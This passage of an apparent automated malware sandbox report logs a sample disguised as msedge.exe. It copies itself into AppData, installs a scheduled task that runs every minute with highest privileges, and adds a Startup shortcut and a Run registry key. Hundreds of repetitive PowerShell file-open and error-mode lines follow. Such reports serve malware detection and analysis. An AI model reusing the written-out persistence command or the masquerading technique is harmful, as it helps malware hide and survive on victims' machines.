                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD3455D2A5 pushad ; iretd 10_2_00007FFD3455D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD34742316 push 8B485F93h; iretd 10_2_00007FFD3474231B
                    Source: C:\Users\user\Desktop\msedge.exe | File created: C:\Users\user\AppData\Local\msedge.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\msedge.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                    Source: C:\Users\user\Desktop\msedge.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
                    Source: C:\Users\user\Desktop\msedge.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
